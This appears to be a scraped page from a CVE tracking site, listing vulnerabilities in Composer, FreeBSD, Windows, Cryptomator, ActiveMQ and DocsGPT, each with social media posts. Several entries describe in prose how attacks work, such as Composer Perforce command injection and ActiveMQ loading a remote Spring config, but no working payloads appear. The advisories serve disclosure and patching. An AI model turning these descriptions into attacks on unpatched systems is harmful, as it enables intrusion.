24h | 7d | 30d

Overview

  • composer
  • composer

15 Apr 2026
Published
16 Apr 2026
Updated

CVSS v3.1
HIGH (8.8)
EPSS
0.04%

KEV

Description

Composer is a dependency manager for PHP. Versions 1.0 through 2.2.26 and 2.3 through 2.9.5 contain a command injection vulnerability in the Perforce::syncCodeBase() method, which appends the $sourceReference parameter to a shell command without proper escaping, and additionally in the Perforce::generateP4Command() method as in GHSA-wg36-wvj6-r67p / CVE-2026-40176, which interpolates user-supplied Perforce connection parameters (port, user, client) from the source url field without proper escaping. An attacker can inject arbitrary commands through crafted source reference or source url values containing shell metacharacters, even if Perforce is not installed. Unlike CVE-2026-40176, the source reference and url are provided as part of package metadata, meaning any compromised or malicious Composer repository can serve package metadata declaring perforce as a source type with malicious values. This vulnerability is exploitable when installing or updating dependencies from source, including the default behavior when installing dev-prefixed versions. This issue has been fixed in Composer 2.2.27 (2.2 LTS) and 2.9.6 (mainline). If developers are unable to immediately update, they can avoid installing dependencies from source by using --prefer-dist or the preferred-install: dist config setting, and only use trusted Composer repositories as a workaround.

Statistics

  • 1 Post
  • 1 Interaction

Last activity: 13 hours ago

Fediverse

Profile picture fallback

Composer (the dominant PHP package manager) shipped 2.9.6 and 2.2.27 LTS in April. The release fixes two command-injection bugs in the Perforce driver. CVE-2026-40261, severity 8.8. A malicious composer.json declares a Perforce repository and the shell runs whether or not Perforce is installed. Packagist disabled Perforce metadata April 10. Most CI build agents kept no audit trail across the ninety days the bug was live.

#PHP #CyberSecurity #DevOps #InfoSec #SupplyChain

  • 0
  • 1
  • 0
  • 13h ago

Overview

  • Pending

Pending
Published
Pending
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

This candidate has been reserved by a CVE Numbering Authority (CNA). This record will be updated by the assigning CNA once details are available.

Statistics

  • 1 Post
  • 1 Interaction

Last activity: 1 hour ago

Fediverse

Profile picture fallback

RE: mastodon.bsd.cafe/@grahamperri

3/

CVE-2026-7270 <cve.org/CVERecord?id=CVE-2026-> FreeBSD-SA-26:13.exec <security.freebsd.org/advisorie> credited to Ryan of Calif.io.

Calif is recently known for post-CVE attention to an earlier CVE, <blog.calif.io/p/mad-bugs-claud>. This work by Calif was wrongly attributed to Nicholas Carlini (an error by Devansh in 'Artificial Intelligence Made Simple').

  • 0
  • 1
  • 0
  • 1h ago

Overview

  • Pending

Pending
Published
Pending
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

This candidate has been reserved by a CVE Numbering Authority (CNA). This record will be updated by the assigning CNA once details are available.

Statistics

  • 1 Post
  • 1 Interaction

Last activity: 1 hour ago

Overview

  • Pending

Pending
Published
Pending
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

This candidate has been reserved by a CVE Numbering Authority (CNA). This record will be updated by the assigning CNA once details are available.

Statistics

  • 1 Post
  • 1 Interaction

Last activity: 8 hours ago

Fediverse

Profile picture fallback

**CVE-2026-3143 copy.fail/**

  • 0
  • 1
  • 0
  • 8h ago

Overview

  • Microsoft
  • Windows 10 Version 1607

10 Feb 2026
Published
10 Apr 2026
Updated

CVSS v3.1
HIGH (8.8)
EPSS
3.35%

Description

Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.

Statistics

  • 2 Posts
  • 1 Interaction

Last activity: 16 hours ago

Bluesky

Profile picture fallback
CISA mandates federal agencies to patch a Windows zero-click vulnerability CVE-2026-32202 by May 12 under BOD 22-01. The flaw connects to APT28 and follows an incomplete Microsoft fix for CVE-2026-21510. #CVE2026 #APT28 #USA
  • 0
  • 1
  • 0
  • 16h ago
Profile picture fallback
📢 Patch incomplet d'APT28 : CVE-2026-21510 laisse place à CVE-2026-32202, coercition d'authentification zero-click 📝 ## 🔍 Contex… https://cyberveille.ch/posts/2026-04-29-patch-incomplet-d-apt28-cve-2026-21510-laisse-place-a-cve-2026-32202-coercition-d-authentification-zero-click/ #APT28 #Cyberveille
  • 0
  • 0
  • 0
  • 16h ago

Overview

  • Pending

Pending
Published
Pending
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

This candidate has been reserved by a CVE Numbering Authority (CNA). This record will be updated by the assigning CNA once details are available.

Statistics

  • 1 Post

Last activity: 1 hour ago

Fediverse

Profile picture fallback

2/

CVE-2026-7164 <cve.org/CVERecord?id=CVE-2026-> FreeBSD-SA-26:14.pf <security.freebsd.org/advisorie> credited to Igor Gabriel Sousa e Souza.

I can't easily find any information about this person.

  • 0
  • 0
  • 0
  • 1h ago

Overview

  • Microsoft
  • Internet Explorer 9

23 Sep 2019
Published
21 Oct 2025
Updated

CVSS
Pending
EPSS
90.77%

Description

A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1221.

Statistics

  • 1 Post

Last activity: 13 hours ago

Overview

  • cryptomator
  • cryptomator

20 Mar 2026
Published
27 Mar 2026
Updated

CVSS v4.0
HIGH (8.7)
EPSS
0.02%

KEV

Description

Cryptomator encrypts data being stored on cloud infrastructure. Prior to version 1.19.1, the Hub-based unlock flow explicitly supports hub+http and consumes Hub endpoints from vault metadata without enforcing HTTPS. As a result, a vault configuration can drive OAuth and key-loading traffic over plaintext HTTP or other insecure endpoint combinations. An active network attacker can tamper with or observe this traffic. Even when the vault key is encrypted for the device, bearer tokens and endpoint-level trust decisions are still exposed to downgrade and interception. This issue has been patched in version 1.19.1.

Statistics

  • 1 Post

Last activity: 19 hours ago

Bluesky

Profile picture fallback
https://zenn.dev/ao9s/articles/cryptomator-hub-http-downgrade 学生がCryptomatorの脆弱性(CVE-2026-32309)を発見し、CVEを取得した体験談です。 外部からの値の検証不足が原因で、HTTP通信へのダウングレード攻撃が可能でした。 報告から修正、CVE公開までの迅速な対応と、再現手順の重要性を解説しています。
  • 0
  • 0
  • 0
  • 19h ago

Overview

  • Apache Software Foundation
  • Apache ActiveMQ Broker
  • org.apache.activemq:activemq-broker

07 Apr 2026
Published
17 Apr 2026
Updated

CVSS
Pending
EPSS
65.07%

Description

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue

Statistics

  • 1 Post

Last activity: 16 hours ago

Fediverse

Profile picture fallback

Remote Code Execution in Apache ActiveMQ

"By calling addNetworkConnector through Jolokia with a crafted URI, an attacker can chain these mechanisms together to force the broker to fetch and execute a remote Spring XML configuration file"

horizon3.ai/attack-research/di

  • 0
  • 0
  • 0
  • 16h ago

Overview

  • arc53
  • DocsGPT

29 Apr 2026
Published
29 Apr 2026
Updated

CVSS v4.0
CRITICAL (10.0)
EPSS
Pending

KEV

Description

DocsGPT is a GPT-powered chat for documentation. From version 0.15.0 to before version 0.16.0, an attacker accessing both the official DocsGPT website or any local and public deployment, can craft a malicious payload bypassing the "MCP test" behavior to achieve arbitrary remote code execution (RCE). This issue has been patched in version 0.16.0.

Statistics

  • 1 Post

Last activity: 5 hours ago

Fediverse

Profile picture fallback

🚨 CRITICAL: CVE-2026-26015 in DocsGPT 0.15.0-0.16.0 enables unauthenticated RCE via command injection (CVSS 10). All deployments at risk — patch to 0.16.0 or later now! radar.offseq.com/threat/cve-20

  • 0
  • 0
  • 0
  • 5h ago
Showing 11 to 20 of 43 CVEs